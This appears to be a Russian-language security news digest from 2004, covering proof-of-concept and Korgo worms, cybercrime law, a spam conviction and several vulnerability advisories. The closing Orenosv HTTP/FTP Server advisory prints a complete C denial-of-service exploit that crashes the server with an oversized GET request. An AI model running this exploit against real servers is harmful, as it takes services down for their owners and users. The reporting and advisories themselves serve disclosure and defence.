Обнаружен первый 64-битный вирус

Компания Symantec только что закончила анализ первого 64-битного вируса и квалифицировала его как «несерьезная угроза». Вирус, получивший название W64.Rugrat.3344, является вирусом "proof-of-concept", то есть доказывает возможность создания таких вирусов в принципе. Этот вирус не вырвался на “свободу”, хотя и является первым червем, способным успешно атаковать 64-битные исполняемые файлы Windows. В то же время вирус не представляет опасность для 32-битных платформ.

Как сообщает The Globe and Mail, W64.Rugrat.3344 - вирус прямого действия, который выгружается из памяти компьютера после заражения. Червь написан на коде IA64 (Intel Architecture) и поражает все исполняемые IA64 файлы, кроме .DLL; заражаются файлы, которые находятся как в одной директории с вирусом, так и в поддиректориях.

Разработаны "гиперссылки" для бумажных документов

Небольшая французская компания Wiziway, основанная Тьери Ламулином, разработала методику, которая позволяет открывать интернет-страницы через "гиперссылки", внедренные в самые обыкновенные бумажные документы.

Важно заметить, что наносящиеся на документы ярлыки имеют площадь всего 3 мм². Это позволяет наносить метки не только на книги, но и на различные буклеты, брошюры небольшого формата и даже визитные карточки. По мнению сотрудников Wiziway, их технология найдет применение в самых различных сферах жизни. В частности, систему можно использовать в процессе обновления онлайновой документации, прайс-листов или спецификаций. Кстати, разработкой Wiziway уже заинтересовались многие компании, в том числе, France Abonnement, Manutan, Axa, Fiducial Office Solutions и Alcatel Diffusion.

Сингапурских спамеров заставят платить

Вопросы международного права и транснациональная киберпреступность

Широкое использование в повседневной жизни компьютерных технологий и создание на их основе глобальных компьютерных сетей, как неотъемлемой части современной международной финансовой и банковской деятельности, создает предпосылки, облегчающие совершение преступных деяний, и часто такие преступления остаются безнаказанными. Распространение компьютерных вирусов и детской порнографии, мошенничества с пластиковыми платежными карточками, хищение денежных средств с банковских счетов, компьютерный терроризм – это далеко не полный перечень подобных преступлений, которые получили название "киберпреступность". Наблюдается опасная тенденция сращивания "киберпреступности" с транснациональной и организованной преступностью.

Интернет давно уже стал прибежищем преступников всех мастей. Сеть, связавшая миллиарды людей по всему миру, дает уникальные возможности не только рядовым пользователям, но и антисоциальным элементам. Анонимность и отсутствие границ делают Интернет эффективным оружием в руках злоумышленников. Расследование и профилактика таких преступления превращается в "головную боль" для сотрудников правоохранительных органов. Если для поимки преступника в «реальном» мире достаточно схватить его за руку, то в виртуальном пространстве злоумышленники зачастую действуют с территории других государств. В этом случае приходится сотрудничать с зарубежными правоохранительными органами, что не всегда представляется возможным.

Учитывая фактор глобализации такого вида преступности, все более очевидным становится то, что ни одно государство сегодня уже не способно самостоятельно противостоять этой опасности. В связи с чем неотложной проблемой становится необходимость активизации международного сотрудничества в этой сфере. Существенное место в таком сотрудничестве принадлежит международно-правовым механизмам регулирования и взаимодействия правоохранительных органов в вопросах противодействия и расследования компьютерных преступлений.

Кроме того, в настоящее время отсутствует широкий консенсус в отношении возможного устранения трансграничных последствий правомерно применяемых следственных действий внутреннего характера. Общепризнано, что государство правомочно применять на своей территории, на которой оно обладает исключительной юрисдикцией, следственные действия или принудительные меры в отношении любого из своих граждан. В результате применения таких полномочий могут возникать случаи, когда размещенные на другой территории данные считываются и копируются или, возможно, уничтожаются. С точки зрения государства, в котором велся поиск данных, такие действия могут образовывать состав уголовного преступления в соответствии с внутренним уголовным правом, а также являться нарушением национального суверенитета.

В то же время согласно другому мнению, международное право не запрещает такое вмешательство, поскольку с технической точки зрения такие данные доступны и могут быть получены из государства, осуществляющего их поиск, без какой-либо помощи или вмешательства со стороны государства, где осуществляется поиск таких данных. Имеющиеся в любых разделах сети данные можно рассматривать как общедоступные, и по этой причине вопрос о доступе к ним из любого государства, в котором они в настоящее время находятся, регулируется исключительно внутренним, а не международным правом. С такой точки зрения обращение к государству, где осуществляется поиск данных, не является необходимым ни на одном из этапов деятельности.

Согласно международному праву, по-прежнему неоднозначен вопрос о том, в какой мере данные являются или не являются общедоступными (например, лица, осуществляющие поиск данных, должны фактически загружать их из сервера одной страны в другую страну), другими словами, вопросов пока остается гораздо больше чем ответов.

Черви атакуют ПК беспечных пользователей

На этой неделе в сети появились сразу три версии червя Korgo, которые используют уязвимость в ОС Windows, о которой стало известно более месяца назад. Это свидетельствует о том, что патч, устраняющий эту уязвимость установили далеко не все пользователи. Черви-“родственники” используют LSASS-дефект, который был обнаружен в середине апреля 2004 г. Korgo.a, Korgo.b и Korgo.c сканируют системы без установленных исправлений так же, как и червь Sasser, который первым использовал эту уязвимость.

Korgo обнаруживает уязвимую систему и подгружает себя. Korgo, также известный как Padobot, случайным образом выбирает IP-адреса компьютеров атакует и инфицирует их, по такому же принципу, что и другие черви, использующие LSASS-дефект. Черви открывают несколько TCP-портов, в том числе 113, 445, 2041, 3067 и 6667 в качестве “задней двери”, а затем соединяется с несколькими IRC-серверами для получения дальнейших команд и передачи информации. В случае удачного проникновения в систему, червь дает хакеру возможность полного контроля над ней.

Тем не менее, червям семейства Korgo большинство анти-вирусных компаний присвоило рейтинг “низкая степень угрозы”, а Symantec поставил им 2 балла по 5-балльной шкале опасности. Однако финская компания F-Secure считает, что вирус достаточно опасен, так как ворует информацию с помощью шпионских программ, мониторящих нажатия на клавиши.

Несмотря на то, что новый вирус не вызвал серьезной эпидемии, антивирусные компании настойчиво рекомендуют пользователям убедиться в том, что исправления, устраняющие уязвимость в LSASS, установлены на их ОС Windows NT, 2000, XP и Windows Server 2003.

Злостный спамер проведет за решеткой семь лет

Говард Кармак, житель штата Нью-Йорк, признан виновным по четырнадцати предъявленным ему обвинениям, среди которых подделка адресов электронной почты, хищение конфиденциальной информации о пользователях интернета и мошенничество.

Осужденный, что, впрочем, не удивительно, своей вины не признает и утверждает, что дело против него было раздуто, а от его рекламной деятельности в Сети никто не пострадал. Кстати, в настоящее время несанкционированные рекламные рассылки составляют свыше 70 процентов от всей корреспонденции, пересылаемой по электронной почте.

Novell говорит твердое "ДА" пятой версии Антивируса Касперского

"Лаборатория Касперского", российский разработчик систем защиты от вирусов, хакерских атак и спама, объявляет об успешном завершении сертификации Антивируса КасперскогоR 5.0 для Novell NetЦare по стандартам компании Novell. Результатом многоуровневого тестирования, проведенного экспертами Novell, стало присуждение российской разработке престижного сертификата "Novell Yes".

Антивирус Касперского 5.0 для Novell NetWare - передовое средство антивирусной защиты файловых серверов, работающих под управлением операционной системы Novell NetWare. Программный комплекс включает в себя последние технологические достижения экспертов "Лаборатории Касперского". Это обеспечивает всестороннюю защиту файлового сервера на основе полного набора средств нейтрализации вредоносных программ. Гибкость конфигурации, широкие возможности администрирования и мониторинга системы, а также реализация инновационных технологий обеспечивают высокую эффективность и надежность продукта.

Ярким подтверждением уникальных качественных характеристик и надежности программы стали высокие результаты, показанные Антивирусом Касперского в ходе испытаний. "Novell NetWare - одна из наиболее популярных операционных систем для файловых серверов. Отличаясь стабильностью и отказоустойчивостью работы, эта система имеет ряд специфических особенностей. Они были в полной мере учтены при создании новой, пятой версии Антивируса Касперского для Novell NetWare. Получение сертификата "Novell Yes" - лучшее признание нашей новинки со стороны непосредственного разработчика ОС", - сказал Денис Зенкин, руководитель информационной службы  "Лаборатории Касперского".
 

Новая версия Maс OS X 10.3.4 содержит старые дыры

Продолжается эпопея URI-уязвимостей в Maс OS. Вчера секьюрити-компания Secunia обновила Advisory #SA11689 (http://secunia.com/advisories/11689), тип которой "чрезвычайно критичный". Дело в том, что, как оказалось, новая, только что выпущенная версия Maс OS X 10.3.4 содержит все те же дыры, о которых сообщается в Advisory. Напомним, что в Maс OS уязвим обработчик URI, уязвимости обнаруживаются при обработке "help", "disk", "ftp", "ssh" URI команд. В различной конфигурации уязвимости позволяют от незаметной загрузки и запуска вредоносного кода на уязвимой машине до открытия прямого соединения к удаленной машине и проброски портов. По-видимому это внутренняя проблема всей структуры обработчика URI в Maс OS. Возможно, что и другие обработчики, кроме перечисленных, также уязвимы различными способами, говорится в Advisory. Ожидается, что не только браузеры, но и другие программы, использующие URI handler, также могут быть уязвимы. Apple выпускала патч закрывающий "help" URI уязвимость. Остальные уязвимости подтверждены на полностью пропатченной Mac OS X 10.3.3 и, как оказалось, на новой Maс OS X 10.3.4.
SearchSecurity.com

OpenSSL уязвимость в Novell iManager и eDirectory

Novell подтвердила наличие множества OpenSSL уязвимостей в Novell iManager и eDirectory, которые позволяют удаленному пользователю провести DoS атаку. Уязвимы Novell eDirectory 8.x, Novell iManager 1.5.x и Novell iManager 2.0.x. Тип уязвимости - "Highly critical". Подробнее о уязвимостях можно узнать в Secunia Advisory: SA11728, SA9886, SA11139.
Оригинальное описание уязвимости от Novell, Патч.

Удалеенный отказ в обслуживании в HP integrated Lights Out (iLO)

Программа: HP integrated Lights Out 1.0-1.55 Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в HP integrated Lights Out (iLO). Удаленный пользователь может вызвать условия отказа в обслуживании. Удаленный пользователь может подключится к iLO на целевом ProLiant сервере, используя нулевой порт, чтобы нарушить работу iLO. URL производителя:http://www.hp.com/ Решение:Установите обновленную версию программы: http://h18004.www1.hp.com/support/files/lights-out/us/index.html

SecurityLab.ru - F-Secure Anti Virus не в состоянни определить Sober.D и Sober.G червей в Zip архивах

Программа: F-Secure Anti Virus Workstation и Server 5.41, 5.42; Client Security 5.50, 5.52 Опасность: Средняя Наличие эксплоита: Не нужен Описание: Уязвимость обнаружена в F-Secure Anti Virus. Программа в некоторых случаях не определяет Sober.D и Sober.G червей. Антивирус от F-Secure не определяет Sober.D и Sober.G червей, содержащихся внутри PKZip архивов (*.zip). В результате, удаленный пользователь может послать червь, который не будет обнаружен антивирусом. URL производителя: http://support.f-secure.com/enu/corporate/downloads/hotfixes/ Решение:Установите соответствующее обновление: For F-Secure Anti Virus 5.41/5.42 for Workstations, use FSAV 5.42/5.41 Hotfix 3: ftp://ftp.f-secure.com/support/hotfix/fsav/fsavwk552-05-signed.fsfix For F-Secure Anti-Virus 5.41/5.42 for File Servers, use FSAV 5.41/5.42 for Servers Hotfix 13: ftp://ftp.f-secure.com/support/hotfix/fsav-server/fsavsr541-13-signed.fsfix For F-Secure Anti Virus Client Security 5.50, 5.52, use FSAVCS Hotfix 10 (Anti-Virus Hotfix 5): ftp://ftp.f-secure.com/support/hotfix/fsavcs/fsavwk552-05-signed.fsfix

Раскрытие паролей других пользователей в Mailman

Программа: Mailman 2.1.x - 2.1.5 Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Mailman. Удаленный пользователь может получить пароль других пользователей. Удаленный пользователь может послать специально сформированный e-mail запрос к mailman серверу, чтобы тот возвратил mailman пароль целевого mailman подписчика. URL производителя: http://mail.python.org/pipermail/mailman-announce/2004-May/000072.html Решение:Установите обновленную версию программы:

Удаленный отказ в обслуживании в Orenosv HTTP/FTP Server

Программа: Orenosv HTTP/FTP Server 0.5.9f Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Orenosv HTTP/FTP Server. Удаленный пользователь может завесить работу Web и FTP сервера. Удаленный пользователь может послать специально сформированный HTTP Get запрос, длиннее 420 символов, чтобы заставить HTTP и FTP службу прекратить обрабатывать сетевые подключения. Пример/Эксплоит: /****************************/ PoC to crash the server /****************************/ /* Orenosv HTTP/FTP Server Denial Of Service Version: orenosv059f Vendor: http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html Coded and Discovered by: badpack3t <badpack3t@security-protocols.com> .:sp research labs:. www.security-protocols.com 5.25.2004 */ #include <winsock2.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") char exploit[] = /* 420 A's - looks ugly but owell */ "GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n"; int main(int argc, char *argv[]) WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *target; int port,bufsize; SOCKET mysocket; if (argc < 2) { printf("Orenosv HTTP/FTP Server DoS by badpack3t\r\n\r\n", argv[0]); printf("Usage:\r\n %s <targetip> [targetport] (default is 9999)\r\n\r\n", argv[0]); printf("www.security-protocols.com\r\n\r\n", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 9999; if (argc >= 3) port = atoi(argv[2]); bufsize = 1024; if (argc >= 4) bufsize = atoi(argv[3]); mysocket = socket(AF_INET, SOCK_STREAM, 0); if(mysocket==INVALID_SOCKET) { printf("Socket error!\r\n"); exit(1); } printf("Resolving Hostnames...\n"); if ((pTarget = gethostbyname(target)) == NULL) { printf("Resolve of %s failed\n", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("Connecting...\n"); if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("Couldn't connect to host.\n"); exit(1); } printf("Connected!...\n"); printf("Sending Payload...\n"); if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1) { printf("Error Sending the Exploit Payload\r\n"); closesocket(mysocket); exit(1); } printf("Payload has been sent! Check if the webserver is dead.\r\n"); closesocket(mysocket); WSACleanup(); return 0; URL производителя: http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.